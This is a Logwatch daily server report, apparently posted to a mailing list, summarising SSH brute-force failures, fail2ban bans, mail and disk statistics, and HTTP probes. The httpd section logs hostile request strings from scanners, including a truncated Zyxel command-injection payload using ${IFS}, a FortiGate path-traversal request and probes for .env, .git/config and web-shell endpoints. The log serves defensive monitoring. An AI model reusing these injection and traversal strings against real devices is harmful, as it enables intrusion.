04:42
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Thu Jan 25 04:42:03 2024
Date Range Processed: yesterday
( 2024-Jan-24 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [280:288]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 15 sites probed the server
162.243.144.12
167.71.3.184
174.138.61.44
185.100.87.136
205.210.31.82
221.126.232.61
39.90.151.250
45.95.169.184
54.198.74.205
54.222.238.164
64.62.197.12
78.153.140.224
80.66.76.149
84.54.51.254
96.43.128.186
Requests with error response codes
400 Bad Request
null: 18 Time(s)
/: 8 Time(s)
*: 4 Time(s)
/.env: 2 Time(s)
[\x22miner1\x22,: 2 Time(s)
\x00\x00BBBB\xBA\x8C\xC1\xABDAAA: 2 Time(s)
mstshash=Administr: 2 Time(s)
/bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${I ... }zyxel.selfrep;: 1 Time(s)
/index.htm: 1 Time(s)
1\xC4\xEC\xEF\xA6kc1\x9EiD(\x91\x1E\xFE\xD ... x09\xC0\x13\xC0: 1 Time(s)
NT: 1 Time(s)
\x8B\x04\x7F\xFB\x91ti\xF9#CC\xFE\xB3={\xF ... D\xC0$\xC0(\xC0: 1 Time(s)
\x96|\x9D\x15fg5\xC0.\x13\x1A<\x94\x94e>\x8F: 1 Time(s)
\xD2\xD3\x13\xAF\x95\xF7:B\xBE\xC4\xA6\x22 ... x09\xC0\x13\xC0: 1 Time(s)
500 Internal Server Error
/: 24 Time(s)
/.env: 4 Time(s)
/web_shell_cmd.gch: 3 Time(s)
/cgi-bin/jarrewrite.sh: 2 Time(s)
/.git/config: 1 Time(s)
/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7: 1 Time(s)
/actuator/gateway/routes: 1 Time(s)
/ajax: 1 Time(s)
/api/v2/cmdb/system/admin/admin: 1 Time(s)
/autodiscover/autodiscover.json?@zdi/Powershell: 1 Time(s)
/cf_scripts/scripts/ajax/ckeditor/ckeditor.js: 1 Time(s)
/dana-na/help/logo.gif: 1 Time(s)
/favicon.ico: 1 Time(s)
/geoserver/web/: 1 Time(s)
/remote/fgt_lang?lang=/../../../..//////// ... lvpn_websession: 1 Time(s)
/robots.txt: 1 Time(s)
/webui/: 1 Time(s)
502 Bad Gateway
/-rCRU_K7RWOzSTXDghlneA/pdf: 1 Time(s)
/StAPF18,6:FSAntworten_auf_resos/pdf: 1 Time(s)
/yaml-metadata/pdf: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (zaor.de): 50 Time(s)
root (103.119.1.52): 36 Time(s)
root (218.92.0.51): 24 Time(s)
root (218.92.0.28): 18 Time(s)
root (222.186.16.207): 18 Time(s)
unknown (133.186.211.96): 14 Time(s)
root (218.92.0.53): 13 Time(s)
unknown (1.12.220.225): 13 Time(s)
unknown (2-226-204-56.ip182.fastwebnet.it): 13 Time(s)
unknown (45.5.159.36): 13 Time(s)
root (218.92.0.55): 12 Time(s)
root (45.13.226.59): 12 Time(s)
unknown (101.32.240.56): 12 Time(s)
unknown (124.251.111.197): 12 Time(s)
unknown (150.109.5.71): 12 Time(s)
unknown (178.22.120.71): 12 Time(s)
unknown (43.134.3.202): 12 Time(s)
unknown (43.138.139.118): 12 Time(s)
unknown (43.153.208.27): 12 Time(s)
unknown (43.156.35.214): 12 Time(s)
unknown (59.14.72.101): 12 Time(s)
unknown (cm-134-228-221-60.buckeyecom.net): 12 Time(s)
unknown (1.12.62.80): 11 Time(s)
unknown (114.67.251.222): 11 Time(s)
unknown (43.134.169.238): 11 Time(s)
unknown (43.134.7.162): 11 Time(s)
unknown (43.135.158.203): 11 Time(s)
unknown (43.143.93.217): 11 Time(s)
unknown (43.153.215.85): 11 Time(s)
unknown (43.154.95.120): 11 Time(s)
unknown (43.155.157.183): 11 Time(s)
unknown (49.233.24.80): 11 Time(s)
unknown (49.51.192.96): 11 Time(s)
root (103.66.49.166): 10 Time(s)
root (154.92.15.96): 10 Time(s)
root (170.210.225.48): 10 Time(s)
root (218.92.0.47): 10 Time(s)
unknown (115.182.212.153): 10 Time(s)
unknown (129.226.158.246): 10 Time(s)
unknown (129.226.201.243): 10 Time(s)
unknown (211.253.37.225): 10 Time(s)
unknown (217-133-27-74.static.clienti.tiscali.it): 10 Time(s)
unknown (220.247.223.56): 10 Time(s)
unknown (221.225.83.45): 10 Time(s)
unknown (77.91.84.54): 10 Time(s)
root (157.1.236.35.bc.googleusercontent.com): 9 Time(s)
root (43.156.1.159): 9 Time(s)
root (public-gprs404789.centertel.pl): 9 Time(s)
unknown (103.238.81.40): 9 Time(s)
unknown (112.161.86.234): 9 Time(s)
unknown (124.220.201.108): 9 Time(s)
unknown (124.221.126.220): 9 Time(s)
unknown (170.106.101.133): 9 Time(s)
unknown (170.106.195.172): 9 Time(s)
unknown (188.166.150.14): 9 Time(s)
unknown (195.178.203.140): 9 Time(s)
unknown (198.23.165.102): 9 Time(s)
unknown (206.81.4.22): 9 Time(s)
unknown (218.211.171.143): 9 Time(s)
unknown (43.134.119.233): 9 Time(s)
unknown (43.135.181.188): 9 Time(s)
unknown (43.153.48.160): 9 Time(s)
unknown (43.153.68.200): 9 Time(s)
unknown (43.153.85.172): 9 Time(s)
unknown (43.154.90.94): 9 Time(s)
unknown (43.159.139.252): 9 Time(s)
unknown (46.101.82.89): 9 Time(s)
unknown (79.137.198.67): 9 Time(s)
unknown (vps-748c461a.vps.ovh.net): 9 Time(s)
root (104.248.89.244): 8 Time(s)
root (202.73.99.196): 8 Time(s)
unknown (142.93.76.36): 8 Time(s)
unknown (187.170.151.89): 8 Time(s)
unknown (77.52.19.44): 8 Time(s)
root (061093186125.static.ctinets.com): 7 Time(s)
root (128.199.28.154): 7 Time(s)
root (187.170.151.89): 7 Time(s)
unknown (121.5.200.78): 7 Time(s)
unknown (170.64.206.132): 7 Time(s)
unknown (180.pool92-177-102.dynamic.orange.es): 7 Time(s)
unknown (catv-78-139-0-92.catv.fixed.vodafone.hu): 7 Time(s)
root (113.125.29.65): 6 Time(s)
root (113.87.226.153): 6 Time(s)
root (121.186.84.26): 6 Time(s)
root (133.186.211.96): 6 Time(s)
root (146.190.225.203): 6 Time(s)
root (146.190.237.92): 6 Time(s)
root (161.35.85.119): 6 Time(s)
root (167.71.70.182): 6 Time(s)
root (178.62.223.147): 6 Time(s)
root (187.141.90.20): 6 Time(s)
root (202.112.212.169): 6 Time(s)
root (217-133-27-74.static.clienti.tiscali.it): 6 Time(s)
root (218.92.0.33): 6 Time(s)
root (218.92.0.40): 6 Time(s)
root (218.92.0.43): 6 Time(s)
root (218.92.0.45): 6 Time(s)
root (218.92.0.59): 6 Time(s)
root (222.186.16.180): 6 Time(s)
root (222.186.16.186): 6 Time(s)
root (43.154.189.227): 6 Time(s)
root (ns397054.ip-94-23-34.eu): 6 Time(s)
unknown (061093186125.static.ctinets.com): 6 Time(s)
unknown (120.53.119.150): 6 Time(s)
unknown (43.154.189.227): 6 Time(s)
unknown (public-gprs404789.centertel.pl): 6 Time(s)
root (142.93.76.36): 5 Time(s)
root (180.pool92-177-102.dynamic.orange.es): 5 Time(s)
root (77.91.78.115): 5 Time(s)
root (84.52.103.234): 5 Time(s)
root (catv-78-139-0-92.catv.fixed.vodafone.hu): 5 Time(s)
unknown (104.248.89.244): 5 Time(s)
unknown (112.173.90.204): 5 Time(s)
unknown (128.199.28.154): 5 Time(s)
unknown (157.1.236.35.bc.googleusercontent.com): 5 Time(s)
unknown (202.73.99.196): 5 Time(s)
unknown (43.156.1.159): 5 Time(s)
unknown (77.91.78.115): 5 Time(s)
unknown (81.68.115.21): 5 Time(s)
unknown (84.52.103.234): 5 Time(s)
root (118.145.132.70): 4 Time(s)
root (81.68.115.21): 4 Time(s)
unknown (103.66.49.166): 4 Time(s)
unknown (112.164.236.13): 4 Time(s)
unknown (170.210.225.48): 4 Time(s)
unknown (202.112.212.169): 4 Time(s)
unknown (45.155.91.99): 4 Time(s)
root (170.64.206.132): 3 Time(s)
root (178.128.161.183): 3 Time(s)
root (195.178.203.140): 3 Time(s)
unknown (124.225.157.249): 3 Time(s)
unknown (154.92.15.96): 3 Time(s)
unknown (31.184.198.71): 3 Time(s)
unknown (85.209.11.254): 3 Time(s)
unknown (85.209.11.27): 3 Time(s)
root (121.178.36.107): 2 Time(s)
unknown (141.98.11.90): 2 Time(s)
unknown (210.91.254.26): 2 Time(s)
mysql (112.161.86.234): 1 Time(s)
mysql (170.64.206.132): 1 Time(s)
mysql (198.23.165.102): 1 Time(s)
mysql (220.247.223.56): 1 Time(s)
mysql (43.134.3.202): 1 Time(s)
mysql (77.52.19.44): 1 Time(s)
postgres (1.12.220.225): 1 Time(s)
postgres (112.161.86.234): 1 Time(s)
postgres (114.67.251.222): 1 Time(s)
postgres (121.5.200.78): 1 Time(s)
postgres (124.220.201.108): 1 Time(s)
postgres (128.199.28.154): 1 Time(s)
postgres (170.106.195.172): 1 Time(s)
postgres (180.pool92-177-102.dynamic.orange.es): 1 Time(s)
postgres (202.112.212.169): 1 Time(s)
postgres (211.253.37.225): 1 Time(s)
postgres (43.134.119.233): 1 Time(s)
postgres (43.153.215.85): 1 Time(s)
postgres (43.154.90.94): 1 Time(s)
postgres (43.155.157.183): 1 Time(s)
postgres (49.51.192.96): 1 Time(s)
postgres (77.52.19.44): 1 Time(s)
postgres (77.91.78.115): 1 Time(s)
postgres (77.91.84.54): 1 Time(s)
postgres (cm-134-228-221-60.buckeyecom.net): 1 Time(s)
postgres (public-gprs404789.centertel.pl): 1 Time(s)
root (120.53.94.178): 1 Time(s)
root (124.225.157.249): 1 Time(s)
root (193.142.147.248): 1 Time(s)
root (195.178.203.131): 1 Time(s)
root (195.178.203.141): 1 Time(s)
root (195.178.203.158): 1 Time(s)
root (198.23.165.102): 1 Time(s)
root (31.184.198.71): 1 Time(s)
root (45.5.159.36): 1 Time(s)
root (85.209.11.254): 1 Time(s)
root (85.209.11.27): 1 Time(s)
unknown (118.37.164.107): 1 Time(s)
unknown (120.53.94.178): 1 Time(s)
unknown (141.98.11.11): 1 Time(s)
unknown (185.196.8.151): 1 Time(s)
unknown (195.178.203.176): 1 Time(s)
unknown (195.178.203.187): 1 Time(s)
unknown (195.178.203.190): 1 Time(s)
unknown (221.160.138.230): 1 Time(s)
Invalid Users:
Unknown Account: 734 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
1 Miscellaneous warnings
23.965K Bytes accepted 24,540
23.965K Bytes sent via SMTP 24,540
======== ==================================================
2 Accepted 100.00%
-------- --------------------------------------------------
2 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
102 Connections
10 Connections lost (inbound)
102 Disconnections
2 Removed from queue
2 Sent via SMTP
1 SMTP dialog errors
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End
-------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
invalid : 1 Time(s)
root : 24 Time(s)
Failed logins from:
1.12.220.225: 1 time
31.184.198.71: 1 time
35.236.1.157 (157.1.236.35.bc.googleusercontent.com): 9 times
37.47.212.118 (public-gprs404789.centertel.pl): 10 times
43.134.3.202: 1 time
43.134.119.233: 1 time
43.153.215.85: 1 time
43.154.90.94: 1 time
43.154.189.227: 6 times
43.155.157.183: 1 time
43.156.1.159: 9 times
45.5.159.36: 1 time
45.13.226.59 (static.45.13.226.59.ht-hosting.de): 12 times
49.51.192.96: 1 time
61.93.186.125 (061093186125.static.ctinets.com): 7 times
77.52.19.44 (77-52-19-44.staticip.vf-ua.net): 2 times
77.91.78.115: 6 times
77.91.84.54: 1 time
78.139.0.92 (catv-78-139-0-92.catv.fixed.vodafone.hu): 5 times
81.68.115.21: 4 times
84.52.103.234 (84-52-103-234.westcall.net): 5 times
85.209.11.27: 1 time
85.209.11.254: 1 time
92.177.102.180 (180.pool92-177-102.dynamic.orange.es): 6 times
94.23.34.95 (ns397054.ip-94-23-34.eu): 6 times
103.66.49.166: 10 times
103.119.1.52: 36 times
104.248.89.244: 8 times
112.161.86.234: 2 times
113.87.226.153: 6 times
113.125.29.65: 6 times
114.67.251.222: 1 time
118.145.132.70: 4 times
120.53.94.178: 1 time
121.5.200.78: 1 time
121.178.36.107: 2 times
121.186.84.26: 6 times
124.220.201.108: 1 time
124.225.157.249: 1 time
128.199.28.154: 8 times
133.186.211.96: 6 times
134.228.221.60 (cm-134-228-221-60.buckeyecom.net): 1 time
138.68.74.198 (zaor.de): 50 times
142.93.76.36 (starwifi-11.28.2023-s-1vcpu-2gb-nyc3-01): 5 times
146.190.225.203: 6 times
146.190.237.92: 6 times
154.92.15.96: 10 times
161.35.85.119: 6 times
167.71.70.182: 6 times
170.64.206.132: 4 times
170.106.195.172: 1 time
170.210.225.48: 10 times
178.62.223.147: 6 times
178.128.161.183: 3 times
187.141.90.20 (customer-187-141-90-20-sta.uninet-ide.com.mx): 6 times
187.170.151.89 (dsl-187-170-151-89-dyn.prod-infinitum.com.mx): 7 times
193.142.147.248: 1 time
195.178.203.131: 1 time
195.178.203.140: 3 times
195.178.203.141: 1 time
195.178.203.158: 1 time
198.23.165.102 (198-23-165-102-host.colocrossing.com): 2 times
202.73.99.196 (fm-dyn-202-73-99-196.fast.net.id): 8 times
202.112.212.169: 7 times
211.253.37.225: 1 time
217.133.27.74 (217-133-27-74.static.clienti.tiscali.it): 6 times
218.92.0.28: 18 times
218.92.0.33: 6 times
218.92.0.40: 6 times
218.92.0.43: 6 times
218.92.0.45: 6 times
218.92.0.47: 10 times
218.92.0.51: 24 times
218.92.0.53: 17 times
218.92.0.55: 12 times
218.92.0.59: 6 times
220.247.223.56 (56.sta.idc-2.slt.lk): 1 time
222.186.16.180: 6 times
222.186.16.186: 6 times
222.186.16.207: 18 times
Illegal users from:
2001:470:1:fb5:6014:3e15:a7fe:74ea: 1 time
undef: 312 times
1.12.62.80: 11 times
1.12.220.225: 13 times
2.226.204.56 (2-226-204-56.ip182.fastwebnet.it): 13 times
31.184.198.71: 3 times
35.236.1.157 (157.1.236.35.bc.googleusercontent.com): 5 times
37.47.212.118 (public-gprs404789.centertel.pl): 6 times
43.134.3.202: 12 times
43.134.7.162: 11 times
43.134.119.233: 9 times
43.134.169.238: 11 times
43.135.158.203: 11 times
43.135.181.188: 9 times
43.138.139.118: 12 times
43.143.93.217: 11 times
43.153.48.160: 9 times
43.153.68.200: 9 times
43.153.85.172: 9 times
43.153.208.27: 12 times
43.153.215.85: 11 times
43.154.90.94: 9 times
43.154.95.120: 11 times
43.154.189.227: 6 times
43.155.157.183: 11 times
43.156.1.159: 5 times
43.156.35.214: 12 times
43.159.139.252: 9 times
45.5.159.36: 13 times
45.155.91.99: 4 times
46.101.82.89: 9 times
49.51.192.96: 11 times
49.233.24.80: 11 times
51.77.58.143 (vps-748c461a.vps.ovh.net): 9 times
59.14.72.101: 12 times
61.93.186.125 (061093186125.static.ctinets.com): 6 times
64.62.197.190 (scan-42i.shadowserver.org): 1 time
77.52.19.44 (77-52-19-44.staticip.vf-ua.net): 8 times
77.91.78.115: 5 times
77.91.84.54: 10 times
78.139.0.92 (catv-78-139-0-92.catv.fixed.vodafone.hu): 7 times
79.137.198.67: 9 times
81.68.115.21: 5 times
84.52.103.234 (84-52-103-234.westcall.net): 5 times
85.209.11.27: 3 times
85.209.11.254: 3 times
92.177.102.180 (180.pool92-177-102.dynamic.orange.es): 7 times
101.32.240.56: 12 times
103.66.49.166: 4 times
103.238.81.40: 9 times
104.248.89.244: 5 times
112.161.86.234: 9 times
112.164.236.13: 4 times
112.173.90.204: 6 times
114.67.251.222: 11 times
115.182.212.153: 10 times
118.37.164.107: 1 time
120.53.94.178: 1 time
120.53.119.150: 6 times
121.5.200.78: 7 times
124.220.201.108: 9 times
124.221.126.220: 9 times
124.225.157.249: 3 times
124.251.111.197: 12 times
128.199.28.154: 5 times
129.226.158.246: 10 times
129.226.201.243: 10 times
133.186.211.96: 17 times
134.228.221.60 (cm-134-228-221-60.buckeyecom.net): 12 times
141.98.11.11 (axon-stall.riddlecamera.net): 1 time
141.98.11.90 (lighten.medyamol.com): 2 times
142.93.76.36 (starwifi-11.28.2023-s-1vcpu-2gb-nyc3-01): 8 times
150.109.5.71: 12 times
154.92.15.96: 3 times
170.64.206.132: 7 times
170.106.101.133: 9 times
170.106.195.172: 9 times
170.210.225.48: 4 times
178.22.120.71: 12 times
185.196.8.151: 1 time
187.170.151.89 (dsl-187-170-151-89-dyn.prod-infinitum.com.mx): 8 times
188.166.150.14: 9 times
195.178.203.140: 9 times
195.178.203.176: 1 time
195.178.203.187: 1 time
195.178.203.190: 1 time
198.23.165.102 (198-23-165-102-host.colocrossing.com): 9 times
202.73.99.196 (fm-dyn-202-73-99-196.fast.net.id): 5 times
202.112.212.169: 4 times
206.81.4.22 (ubuntu-s-blog-vitaminexpert.ai): 9 times
210.91.254.26: 2 times
211.253.37.225: 10 times
217.133.27.74 (217-133-27-74.static.clienti.tiscali.it): 10 times
218.211.171.143 (218-211-171-143.ll.static.sparqnet.net): 9 times
220.247.223.56 (56.sta.idc-2.slt.lk): 10 times
221.160.138.230: 5 times
221.225.83.45: 10 times
**Unmatched Entries**
Disconnecting: Protocol error: expected packet type 21, got 20 [preauth] : 3 time(s)
Disconnecting: Change of username or service not allowed: (admin,ssh-connection) ->
(ubnt,ssh-connection) [preauth] : 1 time(s)
Disconnecting: Change of username or service not allowed: (root,ssh-connection) ->
(admin,ssh-connection) [preauth] : 1 time(s)
Disconnecting: Change of username or service not allowed: (0,ssh-connection) ->
(root,ssh-connection) [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33632p1 394G 243G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################
633
days inactive
633
days old
0 comments
1 participants
participants (1)
-
root@zapf.in